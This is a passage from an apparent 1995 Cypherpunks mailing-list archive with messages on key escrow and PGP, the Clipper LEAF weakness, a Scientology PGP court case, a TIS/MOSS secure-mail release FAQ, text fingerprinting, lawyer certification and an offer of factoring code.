contract. So Hillary did not invest $1000, in fact she invested nothing, but she did put up her entire assets as risk capital just as a Lloyds name does in the insurance market. The key question is whether the kooks win and the net just degenerates into conspiracy theories and so nobody takes any notice of really heinous stuff or whether the net injects some facts into the political debate. The net can be used for both allegations and rebuttal. That type of environment would constitute a genuine information democracy. >the Whitehouse web hits are potentially interesting. I agree they >don't imply any "dissident web monitoring program". the question of >how high a staffer hit those pages and for what reasons is still >unanswered. High ups have better things to do with their time than watch conspiracy theorists blather on. Underlings as not net.enabled. If you think thats bad check out the Congress, they have a limit on the number of Internet enabled staffers per senator and congressbeing. I keep trying to get the message across about T3 lines but they don't seem to get the message. Ever wondered why these poor folks can't use email for their organisations..? If you are wondering about the cypherpunkness of all this I think that these guys should all be using PGP. I'm very carefull to give them the url for the European distribution site however :-) Adam writes: > That said, why should I respect the privacy of government >employees? There is a substantial difference between government and >private companies, in that I am not compelled in any way to do >business any private company. Like I have a choice of going to Comonwealth gas or not having any lights in the appartment... Phill H-B Not speaking for anyone else. From hfinney at shell.portal.com Wed Sep 13 15:28:19 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Sep 95 15:28:19 PDT Subject: Can GAK be made "not interoperable" with PGP? Message-ID: <199509132227.PAA03114@jobe.shell.portal.com> From: Duncan Frissell > At 10:26 AM 9/13/95 -0700, Timothy C. May wrote: > > >But is this even possible, to make a GAK system "not interoperable" with, > >say, PGP? > > > >Unless the GAK system has some sort of entropy analyzer, and can recognize > >high-entropy sources which it presumes to be encrypted data (*), one can of > >course PGP-encrypt a text file and then GAK the resulting file. > > I took it to mean that they were saying that an approved program on one end > of a communication exchange could not exchange encrypted messages or > established an encrypted session of some kind with an un approved program on > the other end. Not trying to outlaw superencryption (PGP on both ends using > a GAKed channel) but GAK on one end working with an unapproved system on the > other end. A ringer GAK-work-alike that would defeat the intent of GAK. Yes, I think this was the idea of the original "software key escrow" proposal, from TIS as I recall. The sender would encode the session key with a government public key but there was some trick by which the receiver would verify that the session key was in fact encoded correctly and refuse to operate if it was wrong. So any attempt to corrupt or remove the LEAF would be detected if you were talking to a compliant receiver. That is part of why Matt Blaze's Clipper attacks were so significant, because they went to the heart of this requirement. It was always clear that you could superencrypt with Clipper, but Matt found a way in which you could send a LEAF which would be accepted by a regular Clipper phone but which had bogus data for law enforcement. So this defeated the requirement of not interoperating with rogues. Hal From msew+ at andrew.cmu.edu Wed Sep 13 15:53:22 1995 From: msew+ at andrew.cmu.edu (Martin C Sweitzer) Date: Wed, 13 Sep 95 15:53:22 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <9509131434.AA23717@toad.com> Message-ID: <8kJq22C00awF0=Na15@andrew.cmu.edu> Excerpts from cypherpunks: 13-Sep-95 CYPHERPUNK considered harmful. by "Peter Trei"@process.com > We call ourselves 'cypherpunks'. While this is derived from the SF > term 'cyberpunk', consider the image we are creating for ourselves: > > A 'punk' is a marginalized young adult, one who rejects the norms > of his or her society, and takes delight in irking those around him with > his or her rejection. The older of us will think of James Dean in 'Rebel > Without a Cause', or Brando in 'The Wild One'. Later, you get images > such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and > other icons of the 'punk rock' movement. Never EVER judge a book by its cover. People that do usually end up being Joe Sixpacks. And by being a Joe Sixpack you don't have that much power in today's society. Martin S From patrick at Verity.COM Wed Sep 13 15:56:36 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 15:56:36 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509132252.AA20787@cantina.verity.com> > > | Oh please! Some clerk browses the internet and you don't want to respect > | their privacy because of the IRS? This makes sense how? I suppose that > | you're going to dig up information about me and spread it around the > | internet because you have issues about the company I work for? > > First off, I was being somewhat sarcastic, as you might have > noticed from several things, not the least of which was the phrase > 'sarcasm aside.' > > That said, why should I respect the privacy of government > employees? There is a substantial difference between government and > private companies, in that I am not compelled in any way to do > business any private company. > > Adam Someone is making you let users at government sites browse your website? Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From cme at acm.org Wed Sep 13 16:09:12 1995 From: cme at acm.org (cme at acm.org) Date: Wed, 13 Sep 95 16:09:12 PDT Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?) In-Reply-To: <199509132001.NAA02021@comsec.com> Message-ID: <9509132212.AA28200@tis.com> >Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT) >From: Brian Davis > In our district, we >managed to convict almost 20 people in an investigation of the state >legislature, including the now-former Speaker of the House and > 6 other >legislators. Bribing lobbyists took hits, etc. > >Particularly effective were the court-approved video and audio tapes of >the Speaker taking a bribe in exchange for certain action on legislation >and responding to the bribing party: "Well bless your heart." >That has become the office's mantra. Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with all gov't officials forced to use keys held by various newspapers and other watchdog agencies.... The video and audio bugs aren't part of the wiretap process so they don't apply here. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From unicorn at polaris.mindport.net Wed Sep 13 16:20:57 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 16:20:57 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: Message-ID: On Fri, 8 Sep 1995, Alan Westrope wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Tonight's local news included an interesting blurb about this case. > The judge refused to order Wollersheim to disclose his passphrase, > since the encrypted material comprised names of Co$ critics > who could then be targeted by the Church. And the secret (and > copyright!) $criptures were read in court and excerpts broadcast > on the news, "close-captioned for the hearing-impaired." Anyone have the name of this action, the court it was in or the name of the judge? I would very much like to see a transcript of his order. > > All the entertaining stuff some of us have been reading on the > net was there: aliens transported to earth, volcanoes h-bombed, > thetans...I laughed my ass off. A bigtime win for PGP and encryption > generally, and a major PR debacle for the $cienos. > > Kute Korrespondences Koda: > > Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers. > I was cleaning out some paperwork and disk file archives recently, > and noticed that the ViaCrypt and Austin Code Works subpoenas were > dated Sept. 9, 1993. Grady Ward of ACW has, of course, been a > major Co$ antagonist, making good use of PGP and the Cypherpunks > remailers. The old message I found detailing these subpoenas was > from this list's sometime visionary, L. Detweiler. > > Alan Westrope > __________/|-, > (_) \|-' 2.6.2 public key: finger / servers > PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If > GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd > WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT > Mkgv7cSClDM= > =Nuz5 > -----END PGP SIGNATURE----- > From rsalz at osf.org Wed Sep 13 16:36:28 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 13 Sep 95 16:36:28 PDT Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available Message-ID: <9509132335.AA05053@sulphur.osf.org> >From pem-dev-request at neptune.tis.com Wed Sep 13 19:27:35 1995 Message-Id: <9509132011.AA19261 at tis.com> Reply-To: James M Galvin To: "MOSS.Announce.List":;, tis.com at TIS.COM Subject: ANNOUNCE: TIS/MOSS Version 7.1 Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0" Content-Id: <2977.811023088.1 at tis.com> Date: Wed, 13 Sep 1995 16:11:35 -0400 ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.2 at tis.com> Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference implementation of MIME Object Security Services (MOSS). TIS/MOSS is a security toolkit that provides digital signature and encryption services for MIME objects. TIS/MOSS includes the "glue" necessary for integration with Version 6.8.3 of the Rand MH Message Handling System, in addition to generic Bourne shell scripts that make it possible to use it with email user agents supporting UNIX shell escapes. In order to foster acceptance of MOSS and provide the community with a usable, working version of this technology, TIS/MOSS is being made available for broad use on the following basis. TIS/MOSS is distributed in source code form, with all modules written in the C programming language. It runs on many UNIX derived platforms. It includes a DOS compilation directive that facilitates its port to DOS/WINDOWS. TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI. TIS/MOSS makes use of undocumented features of RSAREF. RSADSI has given permission for users of TIS/MOSS to use these features, subject to the terms and conditions of both the TIS/MOSS and RSAREF licenses, as distributed with each software package. TIS/MOSS is a product of Trusted Information Systems, Inc. It may be used by organizations and users for exchanging MOSS email messages, subject to the terms and conditions of its license. Enclosed below is the MOSS Frequently Asked Questions, which includes instructions on how to retrieve the software. TIS/MOSS is export controlled by the U.S. Government. As a result it is only available to U.S. and Canadian sites and individuals. Please see the FAQ for more information. ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.3 at tis.com> Content-Description: TIS/MOSS FAQ TIS/MOSS Frequently Asked Questions Last Updated July 1995 Send questions and comments to tismoss-support at tis.com Questions answered: 1) What is MIME Object Security Services (MOSS)? 2) What is MIME? 3) How does MOSS compare to PGP and PEM? 4) Where is the MOSS standard defined? 5) Are there implementations of MOSS available? 6) How do I get TIS/MOSS? 7) Why is TIS/MOSS only available in the US and Canada? 8) Are special privileges (e.g., root access) required to install TIS/MOSS? 9) What about integrating TIS/MOSS into email user agents? 10) What about DOS and other non-UNIX platforms? 11) Is there a forum for MOSS users and developers? 12) What about certificates? 13) What is the Internet Certification hierarchy? 14) What if I have questions or problems with TIS/MOSS? * means that this entry has been recently updated. + means that this entry has been added recently. 1 Q: What is MIME Object Security Services (MOSS)? A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed Internet Standard for adding security services to Multi-purpose Internet Mail Extensions (MIME). It uses the cryptographic techniques of digital signature and encryption to provide origin authentication, integrity, and confidentiality to MIME objects. Users of MOSS can know who originated a message, that the message has not been changed enroute, and that the message was kept secret from everyone except the intended recipients. MOSS depends on the existence of public/private key pairs to support its security services. Users must exchange public keys with those other users with whom they wish to exchange MOSS email. This may be accomplished manually, via mechanisms available in the protocol, via X.509 certificates, or any other suitable mechanism. 2 Q: What is MIME? A: MIME is an Internet Standard (RFC 1521) that defines the format of email message bodies to allow multi-part textual and non-textual message bodies to be represented and exchanged without loss of information. MIME does for message bodies what RFC822 does for message headers. 3 Q: How does MOSS compare to PGP and PEM? PGP can provide the same services but since it is not integrated with MIME the interpretation of the protected content is necessarily user controlled. Note, however, that MIME can carry a PGP object. MOSS is a PEM derivative. It integrates the security services of PEM with MIME, taking advantage of the extensive structuring and formatting facilities of MIME, limited versions of which are necessarily an integral part of the PEM specifications. 4 Q: Where is the MOSS standard defined? A: There is a Proposed Standard published as an RFC that specifies MOSS. This document may be found in your favorite RFC repository. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to "rfc-info at ISI.EDU" with the message body "help: ways_to_get_rfcs". For example: To: rfc-info at ISI.EDU Subject: getting rfcs help: ways_to_get_rfcs 5 Q: Are there implementations of MOSS available? A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has released a reference implementation of MOSS (TIS/MOSS) to the Internet community. TIS/MOSS is a UNIX-based implementation that is easily integrated with email user agents. The source code is openly available in the United States and Canada for non-commercial use. The current version of TIS/MOSS is 7.1. Vendors interested in including TIS/MOSS in their products or integrating it with their services should contact Trusted Information Systems about licensing Trusted Mail (tm) by sending email to tismoss-support at tis.com. 6 Q: How do I get TIS/MOSS? A: TIS/MOSS is available via anonymous ftp in the United States and Canada to US and Canadian citizens and people with a US "green card." To retrieve TIS/MOSS please FTP to host: ftp.tis.com login: anonymous and retrieve the files pub/MOSS/README pub/MOSS/LICENSE pub/MOSS/BUGS The README file contains further instructions. 7 Q: Why is TIS/MOSS only available in the US and Canada? A: The export from the United States of the cryptography used in TIS/MOSS is controlled by the United States government. 8 Q: Are special privileges (e.g., root access) required to install TIS/MOSS? A: No. 9 Q: What about integrating TIS/MOSS into email user agents? A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate it with the Rand MH Message Handling System version 6.8.3. It also includes generic scripts that make the services accessible to any UNIX application that supports shell escapes. If you integrate TIS/MOSS with a popular email user agent, we would be happy to make it available to others. 10 Q: What about DOS and other non-UNIX platforms? A: TIS/MOSS has been ported to DOS and includes a DOS compiler option that may be set to facilitate its installation in DOS environments. It has also been ported to Macintosh although it does not yet include a MAC compiler option. If you port TIS/MOSS to other platforms, we would be happy to make the changes available to others. 11 Q: Is there a forum for MOSS users and developers? A: Yes, there is an email list for users of TIS/MOSS called "tismoss-users at tis.com". To get added to the list send a message to "tismoss-users-request at tis.com". There is an email list for implementors and discussions of the MOSS specifications called "pem-dev at tis.com". This list originated with the PEM protocol, from which MOSS is derived. To get added to the list send a message to "pem-dev-request at tis.com". 12 Q: What about certificates? A: TIS/MOSS supports the use of X.509 certificates including creation, validation, certificate revocation lists, distribution, and destruction. Users may embody their public key in a certificate and may participate in the Internet certification hierarchy or some other private hierarchy. TIS/MOSS neither requires nor enforces any certification hierarchy policy. 13 Q: What is the Internet Certification hierarchy? A: The Internet Certification hierarchy is defined by RFC1422. It is a tree structured hierarchy of certificates with a single, global root called the Internet PCA Registration Authority (IPRA). The IPRA issues certificates to Policy Certification Authorities (PCAs) who issue certificates to Certification Authorities (CAs) who may issue certificates to users or subordinate CAs. Identities are based on distinguished names and there are restrictions on their form and content. For more information on becoming a PCA see the IPRA WWW page at: http://bs.mit.edu:8001/ipra.html or contact the IPRA at: ipra-info at isoc.org For more information on becoming a CA under the TIS PCA contact: tispca-info at tis.com 14 Q: What if I have questions about or problems with TIS/MOSS? A: Send them to "tismoss-support at tis.com". ------- =_aaaaaaaaaa0 Content-Type: multipart/signed; protocol="application/moss-signature"; micalg="md5"; boundary="----- =_aaaaaaaaaa1" ------- =_aaaaaaaaaa1 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.5 at tis.com> Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference implementation of MIME Object Security Services (MOSS). TIS/MOSS is a security toolkit that provides digital signature and encryption services for MIME objects. TIS/MOSS includes the "glue" necessary for integration with Version 6.8.3 of the Rand MH Message Handling System, in addition to generic Bourne shell scripts that make it possible to use it with email user agents supporting UNIX shell escapes. In order to foster acceptance of MOSS and provide the community with a usable, working version of this technology, TIS/MOSS is being made available for broad use on the following basis. TIS/MOSS is distributed in source code form, with all modules written in the C programming language. It runs on many UNIX derived platforms. It includes a DOS compilation directive that facilitates its port to DOS/WINDOWS. TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI. TIS/MOSS makes use of undocumented features of RSAREF. RSADSI has given permission for users of TIS/MOSS to use these features, subject to the terms and conditions of both the TIS/MOSS and RSAREF licenses, as distributed with each software package. TIS/MOSS is a product of Trusted Information Systems, Inc. It may be used by organizations and users for exchanging MOSS email messages, subject to the terms and conditions of its license. Enclosed below is the MOSS Frequently Asked Questions, which includes instructions on how to retrieve the software. TIS/MOSS is export controlled by the U.S. Government. As a result it is only available to U.S. and Canadian sites and individuals. Please see the FAQ for more information. ------- =_aaaaaaaaaa1 Content-Type: application/moss-signature Content-ID: <2977.811023088.4 at tis.com> Content-Transfer-Encoding: quoted-printable Version: 5 Originator-ID: PK,MHkwCgYEVQgBAQICAwADawAwaAJhAMAHQ45ywA357G4fqQ61aoC1fO6B= ekJmG4475mJkwGIUxvDkwuxe/EFdPkXDGBxzdGrW1iuh5K8kl8KRGJ9wh1HU4TrghGdhn0Lw8g= G67Dmb5cBhY9DGwq0CDnrpKZV3cQIDAQAB,EN,2,galvin at tis.com MIC-Info: RSA-MD5,RSA,jZjz1ope/QCf2IwPfkXfB+0bNJsFqJny+xVqjyFaW6QAY0Oy4dru= PxTgYleEFG2qQBP6rbNiucG7g254ClV6hUMG6ksd+qFioFvxqsJ15WylN7Addo/QCzknzhRo45= 6l ------- =_aaaaaaaaaa1-- ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.6 at tis.com> Content-Description: TIS/MOSS FAQ TIS/MOSS Frequently Asked Questions Last Updated July 1995 Send questions and comments to tismoss-support at tis.com Questions answered: 1) What is MIME Object Security Services (MOSS)? 2) What is MIME? 3) How does MOSS compare to PGP and PEM? 4) Where is the MOSS standard defined? 5) Are there implementations of MOSS available? 6) How do I get TIS/MOSS? 7) Why is TIS/MOSS only available in the US and Canada? 8) Are special privileges (e.g., root access) required to install TIS/MOSS? 9) What about integrating TIS/MOSS into email user agents? 10) What about DOS and other non-UNIX platforms? 11) Is there a forum for MOSS users and developers? 12) What about certificates? 13) What is the Internet Certification hierarchy? 14) What if I have questions or problems with TIS/MOSS? * means that this entry has been recently updated. + means that this entry has been added recently. 1 Q: What is MIME Object Security Services (MOSS)? A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed Internet Standard for adding security services to Multi-purpose Internet Mail Extensions (MIME). It uses the cryptographic techniques of digital signature and encryption to provide origin authentication, integrity, and confidentiality to MIME objects. Users of MOSS can know who originated a message, that the message has not been changed enroute, and that the message was kept secret from everyone except the intended recipients. MOSS depends on the existence of public/private key pairs to support its security services. Users must exchange public keys with those other users with whom they wish to exchange MOSS email. This may be accomplished manually, via mechanisms available in the protocol, via X.509 certificates, or any other suitable mechanism. 2 Q: What is MIME? A: MIME is an Internet Standard (RFC 1521) that defines the format of email message bodies to allow multi-part textual and non-textual message bodies to be represented and exchanged without loss of information. MIME does for message bodies what RFC822 does for message headers. 3 Q: How does MOSS compare to PGP and PEM? PGP can provide the same services but since it is not integrated with MIME the interpretation of the protected content is necessarily user controlled. Note, however, that MIME can carry a PGP object. MOSS is a PEM derivative. It integrates the security services of PEM with MIME, taking advantage of the extensive structuring and formatting facilities of MIME, limited versions of which are necessarily an integral part of the PEM specifications. 4 Q: Where is the MOSS standard defined? A: There is a Proposed Standard published as an RFC that specifies MOSS. This document may be found in your favorite RFC repository. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to "rfc-info at ISI.EDU" with the message body "help: ways_to_get_rfcs". For example: To: rfc-info at ISI.EDU Subject: getting rfcs help: ways_to_get_rfcs 5 Q: Are there implementations of MOSS available? A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has released a reference implementation of MOSS (TIS/MOSS) to the Internet community. TIS/MOSS is a UNIX-based implementation that is easily integrated with email user agents. The source code is openly available in the United States and Canada for non-commercial use. The current version of TIS/MOSS is 7.1. Vendors interested in including TIS/MOSS in their products or integrating it with their services should contact Trusted Information Systems about licensing Trusted Mail (tm) by sending email to tismoss-support at tis.com. 6 Q: How do I get TIS/MOSS? A: TIS/MOSS is available via anonymous ftp in the United States and Canada to US and Canadian citizens and people with a US "green card." To retrieve TIS/MOSS please FTP to host: ftp.tis.com login: anonymous and retrieve the files pub/MOSS/README pub/MOSS/LICENSE pub/MOSS/BUGS The README file contains further instructions. 7 Q: Why is TIS/MOSS only available in the US and Canada? A: The export from the United States of the cryptography used in TIS/MOSS is controlled by the United States government. 8 Q: Are special privileges (e.g., root access) required to install TIS/MOSS? A: No. 9 Q: What about integrating TIS/MOSS into email user agents? A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate it with the Rand MH Message Handling System version 6.8.3. It also includes generic scripts that make the services accessible to any UNIX application that supports shell escapes. If you integrate TIS/MOSS with a popular email user agent, we would be happy to make it available to others. 10 Q: What about DOS and other non-UNIX platforms? A: TIS/MOSS has been ported to DOS and includes a DOS compiler option that may be set to facilitate its installation in DOS environments. It has also been ported to Macintosh although it does not yet include a MAC compiler option. If you port TIS/MOSS to other platforms, we would be happy to make the changes available to others. 11 Q: Is there a forum for MOSS users and developers? A: Yes, there is an email list for users of TIS/MOSS called "tismoss-users at tis.com". To get added to the list send a message to "tismoss-users-request at tis.com". There is an email list for implementors and discussions of the MOSS specifications called "pem-dev at tis.com". This list originated with the PEM protocol, from which MOSS is derived. To get added to the list send a message to "pem-dev-request at tis.com". 12 Q: What about certificates? A: TIS/MOSS supports the use of X.509 certificates including creation, validation, certificate revocation lists, distribution, and destruction. Users may embody their public key in a certificate and may participate in the Internet certification hierarchy or some other private hierarchy. TIS/MOSS neither requires nor enforces any certification hierarchy policy. 13 Q: What is the Internet Certification hierarchy? A: The Internet Certification hierarchy is defined by RFC1422. It is a tree structured hierarchy of certificates with a single, global root called the Internet PCA Registration Authority (IPRA). The IPRA issues certificates to Policy Certification Authorities (PCAs) who issue certificates to Certification Authorities (CAs) who may issue certificates to users or subordinate CAs. Identities are based on distinguished names and there are restrictions on their form and content. For more information on becoming a PCA see the IPRA WWW page at: http://bs.mit.edu:8001/ipra.html or contact the IPRA at: ipra-info at isoc.org For more information on becoming a CA under the TIS PCA contact: tispca-info at tis.com 14 Q: What if I have questions about or problems with TIS/MOSS? A: Send them to "tismoss-support at tis.com". ------- =_aaaaaaaaaa0-- From unicorn at polaris.mindport.net Wed Sep 13 16:49:24 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 16:49:24 PDT Subject: Text tracking In-Reply-To: Message-ID: On Mon, 11 Sep 1995 owner-cypherpunks at toad.com wrote: > Hal Finney wrote: > > > I'm not sure how to do it for software, but for novels it > > should be easy to fingerprint. Every couple of pages the > > author writes a sentence twice in different forms. This would > > not take a great deal of extra effort on the part of the > > author. > > Perhaps. Some authors might be offended by the idea that > using a different form of a sentence doesn't affect the work. Examples of "text tracking" in documents where language specificity is important (legal, scientific) are typically marked with changes in the justification scheme, i.e. the number of spaces to the right, number of lines to a page, number of pages total, etc. etc. Clearly it is much more difficult to apply in digital schemes, but consider that in order to modify the scheme to avoid traceback to the distributer, one of two conditions must exist. 1> The distributer must be close to the initial release point. (If not, then all documents ABOVE the distributer in the chain will be text tracked, and all the documents BELOW the distributer will not. Clearly this will brand the distributer). 2> The distributer must be entirely outside the 'legal' distribution scheme. Remember also that uniform modification of text tracking methods is itself identifying unless several 'illegal' distributers are using the same sanitizing method. The same way you can get surgery to have fingerprints removed, but the resulting scars make you all the more identifiable. From dsc at swcp.com Wed Sep 13 17:05:23 1995 From: dsc at swcp.com (Dar Scott) Date: Wed, 13 Sep 95 17:05:23 PDT Subject: cryptography eliminates lawyers? Message-ID: Black Unicorn wrote, >But won't clients insist on proper credentials in one form or another? Yes. >Doesn't the practicality and accountability of a centralized authority >(or several authorities) provide the best answer to this? No. >Who is going >to accept my signature promising that I did indeed get a law degree and >pass the bar? Very few. Certification can be from multiple private and government organizations and might vary depending on the type of legal service (or other lawyer service) needed. Licensing can only be done by an entity that can use physical force to prevent buying and selling legal services. >I don't see how the net will eliminate the basic need for highly >qualified professionals and the proof that they have credentials. It won't. The needs might shift a little but they will be there. >Perhaps diplomas and such will be transfered into digital signatures for >the institutions, but I can't see how this "cracks" any "monopoly." >Perhaps the monopoly is shifted to those who have diplomas, rather than >those "licensed to practice" but so what? It might "crack" government enforced monopoly. Should a market monopoly survive some form of crypto-anarchy it would be in the form of a certification entity that does such a good and efficient job that it is very hard to break into the business. Not so bad if it happens, but much more honest, efficient and softer-edged than "licensed to practice". I suspect that people have needs for varying levels and varying specializations so that several kinds of certifications may develop and might be supplied by multiple entities. I suspect that many people would want a certification that a lawyer meets the usual licensing requirements of the outside world. Who knows, maybe that would be the most popular kind. But it won't be the only kind. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From unicorn at polaris.mindport.net Wed Sep 13 17:30:55 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 17:30:55 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Dar Scott wrote: > Black Unicorn wrote, > >But won't clients insist on proper credentials in one form or another? > > Yes. > > >Doesn't the practicality and accountability of a centralized authority > >(or several authorities) provide the best answer to this? > > No. > > >Who is going > >to accept my signature promising that I did indeed get a law degree and > >pass the bar? > > Very few. > > Certification can be from multiple private and > government organizations and might vary depending > on the type of legal service (or other lawyer service) > needed. Didn't I just say this above? A centralized, or several centralized authorities. I guess the center of my question is, how can you apply Web of Trust to e.g. a university degree. Who cares what Bob and Alice think my degree is in, the client only wants to know from the institution. Licensing can only be done by an > entity that can use physical force to prevent > buying and selling legal services. I believe you are incorrect, but I guess my main concern is your characterization of "Physical force." I am assuming you mean coercion, and not that you will be jailed or such (though this may be the case). I would argue that as long as coercion exists (violence of any type, physical or not) you have a licensing authority. Take the hollywood blacklist. No one actually pushed around suspected pinko screenwriters (well, at least, if anyone did, it was incendential) but they certainly faced a great deal of persuasive motivation. Look at the committee as the licensing authority here. (Licensing you as a non-communist as it were). If several governmental and private authorities were in the practice of certifing that Bob has a law degree from Tremont University, and that he is competent to practice in D.C., and given that the citizens of D.C. will look for these credentials, isn't this a license? Afterall, Bob has to pass some test or requirement to get the signatures. Isn't this coercion in your definition? Can't the multiple authorities set common or near common guidelines? Rather, don't they HAVE to in order to have their signatures worth the electrons they are transmitted with? If you take the exteme position you seem to, there's an antitrust case here. Am I not "licensing" my key signature to people provided they pass my key signature criteria? Am I not doing violence by withholding my signature and the benefits it might convey for certain "terms?" In this definition, all trusted authorities are by definition licensing. Either their signature is worth nothing, and thus they are not coercive by witholding it, or it is worth something, and thus to be non-coercive they must give it to anyone who asks, rendering their signatures worthless. This is the trap of the licensing argument. The evil is not licensing, which I think serves a real purpose, but created convenience fees, taxation through the withholding of licensing and the use of other government largess. I wrote a massive piece on this and sent it to the list about a year and a half ago. With interest I will repost it. The real question is how you decide what an authority to license is. Is it to be dictated by government? Or by market forces (i.e. the reputation of the licenser). > > >I don't see how the net will eliminate the basic need for highly > >qualified professionals and the proof that they have credentials. > > It won't. The needs might shift a little but they > will be there. Then why will lawyers, or a 'professional monopoly' be broken? > >Perhaps diplomas and such will be transfered into digital signatures for > >the institutions, but I can't see how this "cracks" any "monopoly." > >Perhaps the monopoly is shifted to those who have diplomas, rather than > >those "licensed to practice" but so what? > > It might "crack" government enforced monopoly. Now you are getting more specific. > Should a market monopoly survive some form of > crypto-anarchy it would be in the form of a > certification entity that does such a good and > efficient job that it is very hard to break > into the business. Agreed. Again, what does this do to lawyers? See my above comments on what constitutes a license. > Not so bad if it happens, > but much more honest, efficient and softer-edged > than "licensed to practice". I'm not so sure. There will be a tremendous amount of corporate power in these authorities, and if (as you seem to be saying a few paragraphs up) it is hard to break into the trusted certification business, there is a monopoly again. > I suspect that > people have needs for varying levels and varying > specializations so that several kinds of > certifications may develop and might be supplied > by multiple entities. Like the several state Bars? Hint: An attorney licensed in Deleware has a much different speciality likely than one licensed in Alabama. > I suspect that many people would want a > certification that a lawyer meets the usual > licensing requirements of the outside world. > Who knows, maybe that would be the most popular kind. > But it won't be the only kind. So you have estentially admitted that a central authority is required? Or will be more often used? So is this a license or what? Looks like one to me. If your defintion of license is simply who does the coercing, I think you should reconsider. > Dar > > =========================================================== > Dar Scott Home phone: +1 505 299 9497 > > Dar Scott Consulting Voice: +1 505 299 5790 > 8637 Horacio Place NE Email: darscott at aol.com > Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 > http://www.swcp.com/~correspo/DSC/DarScott.html > =========================================================== > > > From don at cs.byu.edu Wed Sep 13 17:39:41 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Wed, 13 Sep 95 17:39:41 PDT Subject: Factoring Software (fwd) Message-ID: <199509140039.SAA00376@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Just saw this on Usenet, was wondering who knows this guy. Obviously not a cpunk or it would have hit the list right away. Not in the mood to run code on my account without knowing that I know what it will do. From: bobs at mathworks.com (Bob Silverman) Newsgroups: sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithmetic Subject: Factoring Code Date: 13 Sep 1995 09:22:38 -0400 Organization: The MathWorks, Inc., Natick, MA 01760 Lines: 41 Distribution: inet Message-ID: <436luu$3lu at puff.mathworks.com> NNTP-Posting-Host: puff.mathworks.com Several people have requested factoring code recently. After thinking about it I have decided to offer a deal. I do not have the machine resources I once had, and have some numbers that I would like factored. They are in the 80-90 digit range. My code will do an 85 digit number in about 500 hours on a single Sparc-10. The code is perfectly parallelizable, so 40 machines will do 85 digits overnight. Run time for QS can vary by a factor of 2.5 depending on how "rich" the number being factored is in small quadratic residues. I will make available my complete Multiple Polynomial Quadratic Sieve code, along with instructions, to anyone who will factor at least one of these numbers. This code includes the siever, the code to combine large primes, the matrix solver (a naiive Gaussian elim over GF(2), but one which solves a 25K x 25K system in 15 min on a single Sparc), and the code to multiply everything together and find the factors. I will also throw in a routine which reads the output file and scans for bad relations. Sometimes, when running on many machines, I/O errors creep into the output files. A machine can go down when writing a record, or there can be a network problem etc. I also have a program which excizes bad records in the output files And one which sets up multiple sub-directories with the proper data files so one can run in parallel. Also included is a program which scans the output files in 